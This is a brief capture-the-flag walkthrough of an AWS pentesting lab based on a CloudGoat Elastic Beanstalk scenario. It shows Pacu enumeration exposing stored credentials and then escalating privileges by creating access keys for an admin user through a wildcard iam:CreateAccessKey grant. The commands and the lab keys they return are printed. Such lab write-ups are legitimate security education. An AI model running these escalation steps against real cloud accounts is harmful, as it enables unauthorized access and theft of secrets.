This is a walkthrough of Capstone Challenge #1: Beanstalk Secrets from Introduction to AWS Pentesting by Tyler Ramsbey. It is based on cloudgoat beanstalk_secrets scenario. You're provided with access to low-privileged user with some Elastic Beanstalk privileges.
With no prior knowledge about Elastic Beanstalk, I've decided to search beanstalk modules in pacu.
Running elasticbeanstalk__enum revealed working AWS credentials SECONDARY_ACCESS_KEY and SECONDARY_SECRET_KEY stored in application's environment variables.
Running iam__bruteforce_permissions module as the secondary user revealed, that this account has wider IAM permissions, that allows listing users, roles and policies.
The arn:aws:iam::.:policy/cgid7y4jbx8ir8_secondary_policy role, that is actually attached to this account, has an interesting grant:
─$ aws iam get-policy-version --policy-arn "arn:aws:iam::.:policy/cgid7y4jbx8ir8_secondary_policy" --version-id v1
[...]
{
"Action": [
"iam:CreateAccessKey"
],
"Effect": "Allow",
"Resource": "*"
},
This wildcard effectively allows access key creation for any user, and therefore assuming any user identity:
└─$ aws iam create-access-key --user-name "cgid7y4jbx8ir8_admin_user"
{
"AccessKey": {
"UserName": "cgid7y4jbx8ir8_admin_user",
"AccessKeyId": "AKIA4CUD5DQHTAFOAGMG",
"Status": "Active",
"SecretAccessKey": "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",
"CreateDate": "2025-05-19T16:25:37+00:00"
}
}
Using the admin account, it is possible to enumerate and retrieve the final flag from Secrets Manager.